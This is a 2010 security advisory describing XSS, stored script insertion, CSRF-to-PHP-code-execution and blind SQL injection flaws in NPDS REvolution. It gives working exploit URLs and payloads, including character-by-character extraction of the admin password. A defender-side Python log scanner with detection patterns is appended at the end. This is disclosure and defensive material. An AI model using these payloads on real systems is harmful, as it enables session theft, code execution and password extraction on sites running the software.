Multiple Vulnerabilities in NPDS REvolution

2010-04-29T00:00:00
ID HTB22363
Type htbridge
Reporter High-Tech Bridge
Modified 2010-04-29T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in NPDS REvolution which could be exploited to perform cross-site scripting (XSS), script insertion and CSRF attacks and to execute arbitrary SQL commands in the application's database.

1) Cross-site scripting vulnerabilities in NPDS REvolution
1.1 The vulnerability exists due to an input sanitization error in the "topic" parameter in /viewtopic.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
http://host/viewtopic.php?topic=3"><script>alert(document.cookie)</script>&forum=1

1.2 The vulnerability exists due to an input sanitization error in the "did" parameter in /download.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
http://host/download.php?op=geninfo&did=1%22%3E%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E

2) Script insertion vulnerability in NPDS REvolution
An input sanitization error exists in the "theme" parameter in /stats.php. A remote attacker can insert arbitrary HTML and script code, which will be executed in the user's browser in the context of the vulnerable website when the user views the malicious data.
Exploitation example:

For exploitation the following steps are required:
1. Visit the page http://host/user.php?op=chgtheme
2. Change the "theme" hidden field to the following value:
<script>alert(document.cookie)</script>
3. Submit the form.
4. Visit the http://host/stats.php page to see the code being executed.

3) Cross-site request forgery (CSRF) in NPDS REvolution
The vulnerability exists due to insufficient validation of the request origin in the "/admin.php" script. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and execute arbitrary PHP code on the target system with privileges of the webserver.
Exploitation example:
<img src="http://host/admin.php?op=ConfigFiles_save&Xtxt=<?+phpinfo()+?>&Xfiles=footer_after&confirm=1">

4) SQL injection vulnerability in NPDS REvolution
The vulnerability exists due to an input sanitization error in the "sortby" parameter in /download.php. A remote attacker can send a specially crafted HTTP GET request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation examples:
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC--
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2849%29%29+DESC--
...
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2884%29%29+DESC--
...
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,2,1%29=char%2848%29%29+DESC--
...
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,2,1%29=char%28101%29%29+DESC--
...
http://host/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,3,1%29=char%2852%29%29+DESC--
...
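An added defender-side example, not part of the advisory: an access-log scanner that flags the request shapes described in items 1 and 4 (non-numeric `topic`/`did` values carrying markup, and a `sortby` value outside an allowed column list that contains SQL) and groups repeated substr() probes from one client as boolean-blind enumeration, since each sortby request above tests a single character of a stored password. The log lines, IP addresses and the sortby column whitelist are constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access-log lines (IPs made up) carrying the request
# shapes this advisory describes; Apache escapes a literal quote as \" in the log.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Apr/2010:10:00:02 +0200] "GET /viewtopic.php?topic=3\\"><script>alert(document.cookie)</script>&forum=1 HTTP/1.1" 200 3110
203.0.113.5 - - [29/Apr/2010:10:00:03 +0200] "GET /download.php?op=geninfo&did=1%22%3E%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E HTTP/1.1" 200 2890
203.0.113.9 - - [29/Apr/2010:10:00:04 +0200] "GET /download.php?dcategory=All&sortby=date HTTP/1.1" 200 4010
203.0.113.9 - - [29/Apr/2010:10:00:05 +0200] "GET /download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC-- HTTP/1.1" 200 4010
203.0.113.9 - - [29/Apr/2010:10:00:06 +0200] "GET /download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2849%29%29+DESC-- HTTP/1.1" 200 4010
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
NUMERIC_PARAMS = {"topic", "did"}                  # record ids: anything but digits is suspect
SORTBY_ALLOWED = {"did", "title", "date", "hits"}  # hypothetical whitelist; real column set is not in the advisory
HTML_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=", re.I)
SQL_RE = re.compile(r"\b(select|union|substr|char)\b|--|/\*", re.I)

def findings_for_path(path):
    """Labels for one request path; an empty list means nothing suspicious."""
    parts = urlsplit(path)
    script = parts.path.rsplit("/", 1)[-1]
    params = parse_qs(parts.query, keep_blank_values=True)  # percent- and plus-decodes values
    out = []
    for name in sorted(NUMERIC_PARAMS.intersection(params)):
        for value in params[name]:
            if not value.isdigit():
                out.append(("xss" if HTML_RE.search(value) else "malformed") + f":{script}:{name}")
    if script == "download.php":
        for value in params.get("sortby", []):
            if value not in SORTBY_ALLOWED and SQL_RE.search(value):
                out.append("sqli:download.php:sortby")
                if "substr(" in value.lower():       # one character per request: boolean-blind shape
                    out.append("blind-probe")
    return out

def scan_log(text, blind_threshold=2):
    """Map each client IP to a Counter of findings; repeated probes become blind-sqli-enumeration."""
    report = defaultdict(Counter)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            report[m["ip"]].update(findings_for_path(m["path"]))
    for counts in report.values():
        if counts["blind-probe"] >= blind_threshold:
            counts["blind-sqli-enumeration"] = counts["blind-probe"]
    return dict(report)
```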